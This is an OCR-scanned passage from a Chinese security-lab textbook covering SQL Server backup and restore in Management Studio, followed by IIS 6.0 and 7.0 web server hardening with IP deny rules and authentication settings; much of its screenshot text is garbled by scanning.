所 有 现 有 备份 集 、 检 查 媒体 集 名 称 和 备份 集 过 期 时 间 。“ 追 加 到 现 有 备份 集 ” 表 示 
将 本 次 备份 添加 到 现 有 媒体 集 的 尾部 ,但 原 有 备份 内 容 依 然 存 在 。“ 覆 盖 所 有 现 
有 备份 集 表 示 去 除 备份 设备 中 现 有 的 备份 集 , 并 将 此 次 备份 写 入 到 备份 设备 中 。 
“检查 媒体 集 名 称 和 备份 集 过 期 时 间 ” 表 示 在 备份 过 程 中 检查 现 有 媒体 集 的 名 称 
和 过 期 时 间 , 当 选中 此 项 时 ,还 可 以 在 “媒体 集 名 称 ” 文 本 框 中 输入 此 次 备份 的 媒 
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9) 查看 连接 属性 


图 6.44 实施 完整 备份 


选择 文件 或 备份 设备 作为 备份 目标 。 悠 可 以 为 党 用 文件 创建 备份 设备 。 
磁盘 上 的 目标 
Охк#&@®: 


Files\Microsoft SQL Server WSSQL 


© Ses о: 


E 


图 6.45 “选择 备份 目标 ”对 话 框 
体 集 名 称 , 可 用 于 区 分 各 次 备份 的 内 容 。 
* 备份 到 新 媒体 集 并 清除 所 有 现 有 备份 集 : 选中 此 项 ,表示 在 此 次 备份 中 ,删除 以 


前 备份 操作 保存 在 此 设备 中 的 媒体 集 ,并 以 “新 媒体 集 名 称 ”文本 框 指 定 的 名 称 写 
和 此 次 备份 的 内 容 。 


。 完成 后 验证 备份 : 此 项 表示 在 完成 后 对 备份 内 容 进 行 验证 ,查看 备份 集 是 否 完整 
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图 6.46 备份 数据 库 选项 设置 


并 可 用 ,可 用 于 确保 备份 的 可 用 性 ,避免 保存 不 可 用 的 备份 。 
写 入 媒体 前 检查 校 验 和 : 校 验 和 用 于 验证 数据 是 否 正 确 可 用 ,选择 此 项 将 在 备份 
写 入 前 检查 校 验 和 ,这 会 增加 系统 的 开支 , 减 慢 备份 的 速度 。 
出 错时 继续 : 用 于 指定 出 现 错误 时 的 处 理 方式 ,在 批 处 理 完 成 多 项 任务 ,或 无 人 
值守 时 ,选中 此 复 选项 可 以 使 系统 继续 执行 后 续 操 作 。 
截断 事务 日 志 / 备 份 日 志 尾 部 ,并 使 数据 库 处 于 还 原状 态 : 这 两 个 选项 只 在 执行 
事务 日 志 备份 时 可 用 。“ 截 断 事务 日 志 ” 表 示 截 断 到 备份 时 间 点 为 止 的 事务 日 志 ， 
此 时 间 点 之 前 保存 在 事务 日 志文 件 中 的 记录 将 被 清除 ,可 释放 日 志 空 间 .“ 备 份 
日 志 尾 部 ,并 使 数据 库 处 于 还 原状 态 ” 用 于 在 还 原 数据 时 备份 尚未 备份 的 事务 日 
志 , 此 时 数据 库 处 于 还 原状 态 .用户 不 能 访问 数据 库 。 

。 磁带 机 : 用 于 在 使 用 磁带 机 作为 备份 设备 时 ,控制 磁带 机 的 行为 。 

(5) 按 需 要 进行 设置 后 , 单 击 “确定 ?按钮 完成 备份 。 

(6) 备份 完成 后 ,可 以 在 备份 设备 中 查看 备份 的 情况 。 具 体操 作 : 在 “服务 器 对 象 ” 
的 “备份 设备 ”节点 中 ,双击 要 查看 的 备份 设备 .在 “备份 设备 ”窗口 中 , 单 击 左边 的 “媒体 内 
容 ” 选 项 可 以 查看 备份 的 情况 ,如 图 6.47 所 示 。 

(7) 在 完成 完整 备份 后 , 往 “ 学 生 选 课 * 数 据 库 的 学 生 表 中 添加 一 条 记录 ,如 图 6.48 
所 示 。 
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图 6.48 学 生 表 记录 


(8) 按照 上 述 步骤 进行 差异 备份 ,如 图 6. 49 所 示 。 

(9) 之 后 ,再 往 学 生 表 中 添加 一 条 记录 ,如 图 6. 50 所 示 。 

(100 按照 上 述 步 又 执行 事务 日 志 备份 .如 图 6. 51 所 示 。 至 此 ,得 到 该 数据 库 的 完整 
备份 .差异 备份 和 事务 日 志 备 份 3 个 备份 文件 。 

4. 利用 备份 进行 恢复 

CD 为 了 使 还 原 操 作 更 加 形象 ,我 们 模拟 数据 库 被 破坏 的 场景 , 先 删 除 “ 学 生 选课 ” 数 
据 库 。 在 Microsoft SQL Server Management Studio Express 主 界面 左 侧 的 “对 象 资源 管 
理 器 "窗口 中 ,展开 服务 器 、 数 据 库 节点 。 右 击 “数据 库 ” 节 点 ,在 弹出 的 快捷 菜单 中 选择 
“还 原 数据 库 ” 选 项 ,如 图 6. 52 所 示 。 
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图 6.50 学生 表 记 录 


(2) 出 现 “ 还 原 数据 库 ” 窗 口 ,在 “还 原 的 目标 ” 栏 中 的 “目标 数据 库 " 输 入 “学 生 选 课 ”， 
在 “还 原 的 源 ” 选 项 组 中 选中 “ 源 设备 " 单 选 按钮 .此 时 ,可 以 单 击 其 后 的 命令 按钮 ,如 图 6. 53 
所 示 。 

G) 在 弹出 的 如 图 6. 54 所 示 的 “指定 设备 ”对 话 框 中 ,备份 媒体 选择 “备份 设备 ”, 单 
击 “ 添 加 ”按钮 ,在 出 现 的 如 图 6. 55 所 示 的 “选择 备份 设备 ”对 话 框 中 选择 备份 设备 “学 生 
选课 ”。 

(4) 单 击 “ 确 定 ” 按 钮 后 ,出 现 如 图 6. 56 所 示 界 面 ,显示 了 源 备份 设备 “学 生 选 课 ” 中 
存储 的 3 个 备份 文件 ,分 别 为 完整 备份 .差异 备份 和 事务 日 志 备份 , 勾 选 这 3 个 备份 文件 ， 
SQL Server 会 依次 还 原 选 中 的 备份 集 ,还 原 到 最 后 一 个 备份 文件 备份 时 的 状态 。 
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图 6.51 选择 事务 日 志 备份 
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图 6.52 选择 “还 原 数 据 库 ” 选 项 
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图 6.53 设置 还 原 的 目标 和 源 
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图 6.54 “指定 备份 ”对话 框 
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图 6.56 选择 用 来 恢复 的 日 志文 件 


(5) 单 击 图 6. 56 左 侧 的 “选项 ,切换 到 “选项 ? 选 


置 ,如 图 6.57 所 示 。 
各 选项 的 含义 如 下 。 


先 项 卡 ,可 以 对 数据 库 还 原 选 项 作 设 


t 覆盖 现 有 数据 库 : 如 果 在 还 原 时 , 现 有 数据 库 文件 已 经 被 破坏 ,SQL Server 服务 
启动 时 会 建立 一 个 替代 性 的 文件 ,但 是 数据 库 处 于 不 可 用 状态 。 此 时 执行 还 原 ， 
会 发 生 无 法 覆盖 SQL Server 自动 生成 文件 的 错误 。 选 中 “覆盖 现 有 数据 库 ” 复 选 
框 ,可 以 强制 覆盖 现 有 数据 库 的 文件 , 当 还 原 的 目标 数据 库 已 存在 ,也 需要 使 用 该 


选项 。 
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图 6.57 设置 恢复 选项 


保留 复制 设置 : 还 原 发 布 数据 库 到 非 建立 该 数据 库 的 服务 器 时 ,选中 此 复 选 框 可 
以 保留 复制 设置 ,有 关 * 复 制 ?的 内 容 不 作 介绍 ,请 参见 联机 丛书 。 

还 原 每 个 备份 之 前 进行 提示 : 用 于 确定 在 还 原 每 个 备份 时 给 出 提示 信息 。 

限制 访问 还 原 的 数据 库 : 限制 只 有 db owner,dbcreate 或 sysadmin 的 成 员 才 能 
访问 此 数据 库 。 

将 数据 库 文件 还 原 为 : 此 栏 可 对 照 备 份 集中 的 数据 库 文 件 ( 包 括 数据 文件 和 日 志 
文件 ) 与 还 原 目 标的 数据 库 文件 ,对 还 原 目标 文件 进行 修改 。 

回 滚 未 提交 的 事务 ,使 数据 库 处 于 可 以 使 用 的 状态 : 无 法 还 原 其 他 事务 日 志 。 
单 选 按钮 是 指 让 还 原 的 数据 库 恢 复 到 可 用 状态 ,并 自动 回 滚 未 完成 的 事务 。 如 果 
后 续 还 有 其 他 备份 集 需 要 还 原 , 不 应 选中 此 单 选 按钮 ,如 果 已 还 原 到 最 后 一 个 事 
务 日 志 备份 , 则 可 以 选中 此 单 选 按钮 。 

不 对 数据 库 执行 任何 操作 ,不 回 滚 未 提交 的 事务 : 可 以 还 原 其 他 事务 日 志 。 此 单 
选 按钮 表示 当前 数据 库 还 处 于 还 原状 态 , 其 他 用 户 不 能 访问 数据 库 , 但 可 以 继续 
还 原 其 他 备份 。 如 果 尚 未 完成 所 有 备份 的 还 原 , 应 该 选中 此 单 选 按钮 。 

使 数据 库 处 于 只 读 模式 : 撤销 未 提交 的 事务 ,但 将 撤销 操作 保存 在 备用 文件 中 ， 
以 便 使 恢复 效果 逆转 。 此 选项 使 被 还 原 的 数据 库 处 于 只 读 状 态 , 可 供用 户 执行 对 
数据 库 的 只 读 访 问 。 如 果 后 续 还 有 其 他 备份 需要 还 原 , 且 需要 在 还 原 过 程 中 允许 
用 户 访问 ,可 以 选择 此 单 选 按钮 。 
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(6) 设置 完成 后 , 单 击 “确定 ”按钮 ,执行 还 原 。 还 原 完毕 后 ,在 “对 象 资源 管理 器 ”中 
刷新 “数据 库 ” 节 点 ,可 以 看 到 “学 生 选 课 ” 数 据 库 已 被 还 原 ,如 图 6. 58 所 示 。 
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图 6.58 成 功 恢复 数据 库 


6.4 练 J A 


(1) 将 登录 名 归 入 某 服务 器 角色 ,除了 可 以 通过 修改 “登录 名 属性 ”进行 操作 外 ,还 可 
以 在 “服务 器 角色 ”中 实现 ,请 通过 实验 验证 。 

(2) 对 数据 库 表 中 数据 执行 一 次 完整 备份 后 ,删除 部 分 记录 ,再 执行 差异 备份 ,验证 
是 否 可 以 通过 完整 备份 差异 备份 恢复 数据 库 。 

(3) 查找 相关 资料 ,对 “学 生 选 课 ” 数 据 库 实施 文件 组 备份 和 恢复 操作 。 


Web 服务 器 和 FTP 服务 器 安全 配置 


7.1 Web 服务 器 概述 


Web 服务 也 称 为 WWW(CWorld Wide Web) 服 务 ,主要 功能 是 提供 网 上 信息 浏览 服 
务 , 是 目前 Internet. 上 最 热门 的 服务 之 一 ,已 经 成 为 人 们 在 网 络 上 查找 浏览 信息 的 主要 
手段 。Web 服务 的 实现 采用 客户 机 /服务 器 模型 ,客户 机 运行 浏览 器 ,通过 HTTP( 超 文 
本 传输 协议 ) 将 用 户 请 求 传递 给 Web 服务 器 ; 服务 器 运行 Web 应 用 程序 ,监听 和 响应 客 
户 端的 HTTP 请 求 。 

为 了 让 用 户 访问 Web 服务 器 提供 的 信息 ,Internet 上 任何 接 入 点 都 可 以 访问 Web 
服务 器 。 因 此 ,Web 服务 器 也 成 为 Internet. 上 最 易 暴 露 的 服务 器 , 随 着 各 类 黑客 工具 在 
网 络 上 的 大 肆 传 播 , Web 服务 器 面临 着 前 所 未 有 的 威胁 。 

当前 流行 的 Web 服务 器 主要 有 Apache, Microsoft IIS, Nginx 等 ,本 章 主 要 介绍 
Windows 操作 系统 平台 下 IIS 的 安全 配置 以 及 Linux 平 台 下 Apache 的 安全 配置 。 

IIS 是 Internet Information Services 的 缩写 ,是 由 微软 公司 提供 的 基于 Windows 操 
作 系 统 的 因特网 基本 服务 。IIS 是 一 种 Web 服务 组 件 , 包 括 Web 服务 器 、FTP 服务 器 、 
SMTP 服务 器 等 ,分 别 用 于 网 页 浏览 ,文件 传输 、 邮 件 发 送 等 , 因 其 配置 简单 ,易于 掌握 ， 
已 成 为 快速 搭建 Web 服务 的 首选 。IIS 最 早 集成 在 Windows NT Server 4.0 版 本 上 , 随 
后 与 Windows 2000, Windows XP Professional, Windows Server 2003, Windows 7 等 版 
本 捆绑 一 起 发 行 。 目 前 常用 版 本 为 15 7. 0, 包 含 在 Windows Server 2008, Windows 
Server 2008 R2, Windows Vista 和 Windows 7 的 某 些 版 本 中 。 

ApacheHTTP Server( 简 称 Apache) 是 一 个 开放 源 代码 的 Web 服务 器 ,最 早 发 布 于 
1995 年 12 月 ,可 以 在 Windows, Linux, Unix 等 操作 系统 下 运行 ,由 于 其 具有 简单 .速度 
快 . 跨 平台 、 性 能 稳定 、 较 高 的 安全 性 等 特点 而 被 广泛 使 用 .是 目前 使 用 排名 第 一 的 Web 
服务 器 。 


7.2 FTP 服务 器 概述 


FTP 的 英文 全 名 为 File Transfer Protocol, 即 文件 传输 协议 ,是 专门 用 来 在 计算 机 之 
间 进 行文 件 传输 的 协议 。 与 大 多 数 Internet 服务 一 样 ,FTP 也 是 一 个 客户 机 /服务 器 系 
统 , 用 户 通 过 一 个 支持 FTP 协议 的 客户 端 程序 连接 到 远程 主机 上 的 FTP 服务 器 程序 ,之 
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后 用 户 就 可 以 向 服务 器 程序 发 出 文件 请 求 命令 ,服务 器 程序 执行 用 户 命令 ,将 文件 传送 到 
客户 机 。 

当前 ,针对 FTP 服务 器 的 攻击 越 来 越 多 ,比如 : 在 文件 传输 过 程 中 ,信息 内 容 被 人 通 
过 第 三 方 软件 (Sniffer 等 嗅 探 器 ) 截 获 , 或 者 通过 一 些 手段 控制 服务 器 删除 共享 文件 ,或 
者 利用 FTP 服务 器 来 传播 木马 与 病毒 等 ,这 些 攻 击 给 服务 器 的 共享 文件 带 来 极 大 的 安全 
威胁 ,因此 配置 安全 的 FTP 服务 器 十 分 重要 。 

FTP 服务 器 软件 有 很 多 ,本 章 主要 介绍 Windows 环境 下 IIS FTP 服务 器 的 安全 
配置 。 

Microsoft IIS 所 带 的 FTP 服务 器 功能 并 不 比 其 他 专业 服务 器 软件 逊色 ,而 且 由 于 其 
用 户 管理 和 Windows 的 用 户 管理 整合 在 一 起 ,与 Windows 有 更 好 的 整合 性 ,这 使 其 变 得 
更 加 安全 。 

在 Linux 下 实现 FTP 的 软件 很 多 ,比较 有 名 的 有 WU-FTPD、ProFTPD、VsFTPD 
等 ,其 中 VsFTPD(Very Secure FTPD) 是 Red Hat Enterprise Linux 5 内 置 的 FTP 服务 
器 ,安全 性 是 其 初衷 , 除 此 之 外 ,高 速 和 高 稳定 性 也 是 VsFTPD 的 两 个 重要 特点 。 


7.3 Windows IIS Web 服务 器 安全 配置 实验 


7.3.1 实验 目的 
掌握 Windows 下 IIS Web 服务 器 的 安全 配置 方法 。 
7.3.2 实验 内 容 及 环境 


1. 实验 内 容 

由 于 IIS 6.0 和 IIS 7. 0 的 安装 配置 方法 有 较 大 不 同 , 本 教材 为 了 兼顾 两 个 版 本 的 用 
户 ,分 别 介绍 Windows Server 2003 IIS 6.0 和 Windows 7 IIS 7. 0 的 Web 服务 器 安全 配 
置 方法 。 安 全 配置 主要 涉及 首页 和 端口 设置 .网 站 身份 认证 和 访问 控制 设置 。 

2. 实验 环境 

实验 拓扑 如 图 7. 1 所 示 ,实验 需要 主流 配置 计算 机 两 台 ,一 台 作 为 Web 客户 端 ,其 作 
用 是 验证 Web 服务 器 的 安全 配置 ,安装 Windows 7.1Р 地 址 为 192. 168. 88. 211; 另外 一 
REH Web 服务 器 ,设置 IP 地 址 为 192. 168. 88. 1 .依次 安装 Windows Server 2003, 
Windows 7 操作 系统 ,分别 进行 15 6.0 ЯП IIS 7. 0 的 安全 配置 实验 。 


-© 


Web 客 户 端 Web 服 务 器 
IP: 192.168.88.211 IP: 192.168.88.1 


图 7.1 实验 拓扑 
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7.3.3 实验 步骤 


1. IIS 6. 0 Web 服务 器 安全 配置 

1) Windows Server 2003 中 IIS 6. 0 的 安装 

(1) f£ Windows Server 2003 中 选择 “开始 ”>“ 控 制 面板 ”>“ 添 加 或 删除 程序 ”>“ 添 
加 /删除 Windows 组 件 ” 选 项 ,在 出 现 的 “Windows 组 件 向 导 ” 中 色 选 “应 用 程序 服务 器 ”， 
如 图 7.2 所 示 。 


TYindows 钥 件 向 导 


图 7.2 添加 应 用 程序 服务 器 


(2) 单 击 图 7. 2 右 下 方 的 “详细 信息 ”按钮 ,出 现 如 图 7. З 所 示 对 话 框 ,确保 勾 选 
“Internet 信息 服务 ”, 按 提示 完成 IIS 的 安装 。 


应 用 程序 服务 器 


7.3 添加 “Internet 信息 服务 ?组件 
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(3) 安装 完 TIS 服务 器 后 ,选择 “开始 ”>“ 程 序 ”>“IIS 管理 器 "选项, 右 击 “网 站 ” 选 
项 ,在 弹出 的 快捷 菜单 中 选择 新建" 网 站 ?选项 ,进入 新 建 网 站 向 导 , 可 设置 网 站 IP 地 
址 和 端口 号 、 网 站 主 目录 路 径 、 网 站 访问 权限 等 ,如 图 7.4 所 示 。 


IP 地 址 和 请 口 设置 
指定 新 网 站 的 ІР 地 址 ,端口 设置 和 主机 头 。 


т.а 设置 网 站 IP 和 端口 


Са) 右 击 刚 创 建 的 网 站 ,在 弹出 的 快捷 菜单 中 选择 * 属 性 ?选项 ,在 出 现 的 如 图 7. 5 所 
示 的 对 话 框 中 单 击 “ 文 档 ” 选 项 卡 ,通过 上 下 移动 文档 可 以 设置 网 站 的 默认 首页 。 


图 7.5 设置 网 站 的 默认 首页 


2) 拒绝 某 台 计算 机 访问 该 网 站 
CD 右 击 刚 创建 的 网 站 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,在 出 现 的 对 话 框 中 ， 
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选择 “目录 安全 性 ”选项 卡 ,在 “IP 地 址 和 域名 限制 ? 栏 单 击 * 编 辑 按 钮 ,出 现 如 图 7.6 所 
示 的 “IP 地 址 和 域名 限制 ?对 话 框 中 ,在 该 对 话 框 中 ,可 以 设置 授权 访问 ( 白 名 单 ) 和 拒绝 
访问 ( 黑 名 单 ) 策 略 ,图 7.6 中 设置 的 网 站 访问 权限 拒绝 IP 地 址 为 192. 168. 88. 211 的 计 
算 机 访问 该 网 站 。 


E Internet 信息 服务 (IIS) 管 理 器 


Hu — [| 性能 | rsr 第 先 器 
目录 安全 性 | HTP 头 


身份 验证 和 访问 控制 
à raso 问 资源 及 编辑 身份 验证 方 


IP 地 址 和 域名 限制 
@ bs IP RE т Internet 域名 授权 或 


ABO... 
IP 地 址 和 域名 限制 


IP 地 址 访问 限制 
默认 情况 下 ， 所 有 计算 机 都 格 被 :。 7 加 授权 访问 @) 
@ Ошен 


访问 IP 地 址 FRIED) 


T 


az) (mn) (жаш) 
图 7.6 “IP 地 址 和 域名 限制 "对 话 杠 


(2) 在 IP 为 192.168. 88.211 的 计算 机 上 打开 浏览 器 ,访问 在 IP 地 址 192. 168. 88.1 
上 架设 的 网 站 ,访问 被 拒绝 ,如 图 7.7 所 示 。 


ХЫ RBO FEV 收藏 他 工具 四 “帮助 (H 


G7% - O- (did Dus vem Ө G- $$ 


НАНО) (Æ http://192.168.88.1:8013/ 


您 未 被 授权 查看 该 页 


您 试图 访问 的 Web 服务 器 上 有 一 个 不 被 允许 访问 该 网 站 的 IP 地 址 列表 ， 并 且 您 用 来 浏览 
的 计算 机 的 IP 地 址 也 在 其 中 。 


请 尝试 以 下 操作 : 
• 如 果 您 认为 自己 应 该 能 够 查看 该 目录 或 页 面 ， 请 与 网 站 管理 员 联 系 . 


ттр HRR 403.6 - 禁止 访问 : 客户 端的 IP 地 址 被 拒绝 。 
Internet 信息 服务 (15) 


Ф Internet 


图 7.7 网 站 访问 请 求 被 拒绝 
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3) 通过 配置 ,要 求 用 户 访问 网 站 需要 进行 身份 认证 

默认 情况 下 ,访问 网 站 不 需要 进行 身份 认证 ,也 即 允 许 匿名 登录 , 某 些 安全 性 要 求 比 
较 高 的 网 站 只 允许 合法 用 户 访 问 ,因此 要 求 用 户 访问 网 站 时 进行 身份 认证 。 

CD 右 击 刚 创建 的 网 站 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,在 出 现 的 对 话 框 中 ， 
选择 “目录 安全 性 ”选项 卡 , 在 “身份 验证 和 访问 控制 栏 , 单 击 “ 编 辑 ” 按 钮 ,出 现 如 图 7. 8 
所 示 的 对 话 框 ,在 对 话 框 中 ,注意 确保 不 要 勾 选 “ 启 用 匿名 访问 ”选项 ,在 “用 户 访问 需 经 过 
身份 验证 ”面板 中 色 选 “集成 Windows 身份 认证 “基本 身份 验证 (以 明文 形式 发 送 密码 )” 
选项 ,这 样 设置 后 访问 网 站 需要 进行 身份 验证 , 且 身 份 验 证 借助 于 Windows 的 身份 认证 
机 制 , 也 即 Windows 系统 的 合法 用 户 可 登录 该 网 站 。 

(2) 在 全 地 址 为 192.168. 88. 211 的 计算 机 上 通过 浏览 器 访问 在 IP 地 址 192. 168. 88. 1 
上 架设 的 网 站 ,弹出 如 图 7.9 所 示 的 身份 验证 对 话 框 ,输入 合法 的 Windows 系统 用 户 名 
和 口令 , 即 可 进入 网 站 。 


身份 验证 方法 


па 
对 匿名 访问 使 用 下 列 Windows 用 户 账户 


用 户 访问 需 经 过 身份 验证 


WE aae. 要 求 用 户 名 和 密码 : 
= Ё ТЕЗ 访问 答 制 列表 限制 了 访问 权限 


М SERE, Windows 身份 验证 QD 
Г] Windows 域 服务 器 的 摘要 式 身份 验证 (D) 
M 基本 身份 验证 (以 明文 形式 发 送 密码 ) (6) 
C -NET Passport 身份 验证 D) 
кийа): | ®# 1) 


9 0): [ 选择 四 


正在 连接 到 | 192. 168. 66.1 


ВРА в Eí 


EBO: 


回 记 住 我 的 密码 QD 


图 7.8 “ 设 轩 身份 验证 "对 话 框 т.о 身份 验证 对 话 框 


(m) | юз )| #&ю®ф | 


2. IIS 7. 0 Web 服务 器 安全 配置 

1) Windows 7 中 IIS 7. 0 的 安装 

(1) f£ Windows 7 中 选择 “开始 ”>“ 控 制 面板 ”>“ 程 序 和 功能 ”选项 ,出 现 如 图 7. 10 
所 示 界 面 。 

(2) 单 击 图 7.10 左 栏 的 “打开 或 关闭 Windows 功能 ”. 出 现 如 图 7. 11 所 示 界 面 , 选 
择 安 装 “Internet 信息 服务 ”, 单 击 “ 确 定 ” 按 钮 后 ,系统 进行 “Internet 信息 服务 ”的 安装 。 

(3) 安装 完成 后 ,选择 “开始 ”>“ 控 制 面板 ”>“ 管 理工 具 ” 选 项 ,出 现 如 图 7. 12 所 示 
界面 。 
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图 7.10 Windows ЙК р РЕКИ ГІ 


打开 或 关闭 Windows 功能 


若 要 打开 一 种 功能 ,请 选择 其 复 选 框 。 若 要 关闭 一 种 功能 ， 请 清除 其 复 选 框 . 填 
充 的 框 表示 仅 打开 该 功能 的 一 部 分 。 


ГЇ; Internet Information Services 可 承载 的 Web 核心 


T) FTP 服务 器 

D FP 服务 

J FTP 扩展 性 

Web 管理 工具 

J us 6 anset 

J ns 管理 服务 

J us 管理 脚本 和 工具 

Ш етене 

万 维 网 服务 

J 安全 性 

J 常见 HTTP 功能 

ШШ}; 性 能 功能 

J 应 用 程序 开发 功能 

TJ 运行 状况 和 诊断 

J} Microsoft .NET Framework 3.5.1 
И Microsoft Message Queue (MSMQ) 服务 器 


Сағ] 


= шш ® а Ш 


图 7.11 打开 “Internet 信息 服务 ”功能 


(4) 双击 图 7.12 中 的 “Internet 信息 服务 (IIS) 管 理 器 ?选项 ,出 现 如 图 7. 13 所 示 的 
IIS 管理 界面 ,在 该 界面 中 可 以 创建 新 的 网 站 。 
(5) Aii 7. 13 左 侧 的 “网 站 ”图 标 ,在 弹出 的 快捷 菜单 中 选择 “添加 网 站 ”选项 ,出 
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ETTTYTYELNTHNE Y B 
Internet 信息 服务 (1S) 管 理 器 使 人 可 以 配置 和 控制 IIS 及 ASP.NET , 并 解决 в 


I Wt 
2014/1/24 1715 
2014/1/24 17:15 
2009/7/14 12:41 
2009/7/14 12:41 
2009/7/14 12:41 
2009/7/14 12:42 
2009/7/14 12:42 
тнв 2009/7/14 12:41 
& siens (с) 2009/7/14 1241 
са stu (D) 2009/7/14 12:41 
Са backup (Е) 4 2009/7/14 12:46 
са tools (Р) 
Ө DVD RW EI (G) ~ 
Internet 信息 服务 (IS) 管 理 器 修改 日 期 : 2018/12/25 1518 创建 日 期 : 2018/12/25 15:18 
RES 大 小 1.24 KB 


更 改 МЕТ Framework 版 本 | 


eus 
LL 


图 7.13 IIS 管理 主 界面 


现 如 图 7. 14 所 示 对 话 框 ,在 该 界面 中 可 以 设置 新 架设 网 站 的 物理 路 径 、IP 地 址 和 端口 
号 等 。 

(6) 在 新 架设 网 站 的 物理 路 径 下 创建 文件 test. txt, 其 内 容 如 图 7. 15 所 示 ,保存 后 修 
改 文件 名 为 test. html, 在 另 一 台 IP 地 址 为 192. 168. 88. 211 的 计算 机 上 (事先 确保 两 台 
计算 机 联通 ) 打 开 浏 览 器 ,输入 URL: http://192. 168. 88. 1: 8013/test. html, 能 访问 到 
VIE" Hello World" ,说明 网 站 架设 成 功 .如 图 7. 16 所 示 。 
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添加 网 站 ÍO C 
网 站 名 称 (S}: БЕЛЕМ): 
Myweb Myweb ЖЕЙДЕ)... 
内 容 目录 
物理 路 径 (P): 


SE 

жт): IP 地 址 0D): 00): 
http m| 192.168.88.1 ~ во | 
ENAH: 


RR: www.contoso.com 或 marketing.contoso.com 


[v] 立即 启动 网 站 (M) 


qu ня 


图 7.14 设置 网 站 名 称 ,物理 路 径 、IP 地 址 、 端 口 等 参数 


<html> E 
<body» 
Hello, World!!! 


图 7.15 测试 网 页 内 容 


З nttp://192.168.88. 1:8013/test-htal - Nicroso... |- | ЕЗ 
XMp REO SEV Ж ТАФ Who mE, 
Ов - о-ва о Рея Jw e 2-223 

地 址 (Æ) http://192. 168. 88. 1:8013/test. htal М 链接 


Hello, World!!! 


图 7.16 成 功 访问 到 网 页 
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2) 设置 限制 某 个 IP 访问 


A) 打开 Internet 信息 服务 (IIS) 管 理 器 窗口 ,在 界面 右 侧 双击 *IP 地 址 和 域 限制 "图 
标 , 如 图 7. 17 所 示 。 


a — ATAO - 282744) | Side км ЕЗ 
^d Ri m _ 
[фе | & um [m = 8 Q # xu d о 5 & 
Өм» HTTP йш НТТР ETA Ір іезнож маме зеш  SSLQB Меьолу Әу NPETE вилт ames arsa 
x ти там 
ü a e 9 
Ht збыт somu muy пе 


图 7.17 JIP 地 址 和 域 限制 


(2) 出 现 如 图 7. 18 所 示 界 面 , 右 击 界面 空白 处 ,弹出 快捷 菜单 ,可 以 设置 网 站 访问 的 
黑白 名 单 , 这 里 我 们 演示 如 何 设 置 黑 名 单 , 单 击 快捷 菜单 “添加 拒绝 条 目 ”。 


Ki Internet 信息 服务 人 
GO [e > SAS-PC » 网 站 » Myweb > 
一 @ IP 地 址 和 域 限制 
4798 SAS-PC (sas-PC\lenovo) || 使 用 此 功能 可 以 基于 IP 地 址 莹 域名 限制 或 授予 访问 Web 内 容 的 权限 。 按 优先 级 顺序 设置 限制 
Q sme 
4 国 网 站 same жиян f 
@ Default Web Site ax AREF 条 目 类 型 
@ Myweb 
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G) 出 现 如 图 7. 19 所 示 的 “添加 拒绝 限制 规则 ”对 话 框 ,可 以 设置 拒绝 访问 网 站 的 特 
JE IP 或 IP 地 址 范围 .这 里 我 们 添加 一 个 特定 IP 地 址 192. 168. 88. 211, 设 置 完 成 后 可 以 
验证 ,该 IP 地 址 的 计算 机 无 法 访问 新 建 网 站 ,如 图 7. 20 所 示 。 

3) 启用 身份 认证 

IIS 网 站 默认 开启 匿名 身份 认证 ,允许 所 有 用 户 连 接 , 如 果 网 站 只 需要 对 特定 用 户 开 
放 的 话 ,就 需要 用 户 进行 其 他 方式 的 身份 验证 ,IIS 7. 0 身份 认证 的 主要 方法 有 基本 身份 
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TRUEHURSURAL ^0 sc 
拒绝 访问 以 下 P 地 址 或 域名 : 
| е жерн: 
192.168.88.211] I 
© IP 地 址 范围 (R)}: 


图 7.19 “添加 拒绝 限制 规则 ”对 话 框 


蔡 止 访问 : 访问 被 拒绝 。 - Microsoft Internet Expl... [„ |50] 
XPO 80) ЖБО бй ТАТ 帮助 00 


HEHE) (E) http://192. 168. 88. 1:8013/test. htnl 


403 - 禁止 访问 : 访问 被 拒绝 。 
您 无 权 使 用 所 提供 的 凭据 查看 此 目录 或 页 面 。 


图 7.20 网 页 访问 被 拒绝 


验证 .摘要 式 身份 验证 和 Windows 集成 身份 验证 。 

* 基本 身份 验证 : 若 启用 该 项 , 则 在 访问 站 点 时 ,会 要 求 用 户 输入 口令 ,通常 在 网 站 
后 台 等 目录 常用 此 身份 认证 方式 。 
摘要 式 身份 验证 : 若 启用 该 项 , 则 用 户 在 访问 时 也 需要 输入 用 户 名 和 密码 ,这 种 
方式 比 基 本 身份 认证 方式 更 安全 .基本 身份 认证 在 网 络 上 传输 口令 时 不 加 密 , 而 
摘要 式 身 份 验证 则 使 用 MD5 算法 加 密 口 令 。 摘 要 式 身 份 认 证 是 使 用 Windows 
域 控制 器 对 请 求 访问 Web 服务 器 内 容 的 用 户 进行 身份 验证 。 开 启 摘 要 式 身份 验 
证 必须 具备 以 下 条 件 : TIS 服务 器 必须 是 Windows 域 控 制 器 成 员 或 域 控制 器 ; 用 
户 登录 账户 必须 是 域 控制 器 账户 。 
* Windows 集成 身份 验证 : 如 果 和 希望 客户 端 使 用 NTLM 或 Kerberos 协议 进行 身 
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份 验证 , 则 应 该 使 用 Windows 身份 验证 。Windows 身份 验证 同时 包括 NTLM 和 


Kerberos V5 身份 验证 ,要 求 客户 端 计 算 机 和 Web 服务 器 位 于 同一 域 中 ,这 种 认 
证 方式 比较 适合 Intranet 环境 。 


本 实验 主要 介绍 基本 身份 验证 方式 的 设置 。 


(1) 打开 Internet 信息 服务 (1IS) 管 理 器 窗口 .在 界面 右 侧 双击 “身份 认证 ”图 标 ,如 
图 7.21 所 示 。 


Si» ЗАС ， 
zen WEN) smo 
— Өй sas-Pc 主页 
| a 9 SAS-PC (sas-POenovo) | mm + фео) -CAERA |а: кч DER 
Term " "P 
| € Defaut web sie n s 


è ы & @ uak d o o B 
FIp IPv4 地 РТР 55.48 РТР} FIPHEON PERS FPES FIPAGE РН РӘ FPA 
D ш E п z 证 则 


图 7.21 设置 身份 认证 方式 
(2) 出 现 如 图 7. 22 所 示 界 面 , 右 击 “基本 身份 验证 ”项 ,在 弹出 的 快捷 菜单 中 选择 “ 启 
用 ”选项 ,同时 需要 关闭 “匿名 身份 验证 ”。 


[STE » SAS-PC » 


文件 (月 REV 。 帮助 (H) 


=] н 
"Y «y Somr 


L _________—) 
4 S3 SAS-PC (sas-PC\lenovo) 
二 应 用 程序 池 


分 组 依据 :不 进行 分 组 - 
119 网 站 名 称 状态 响应 类 型 
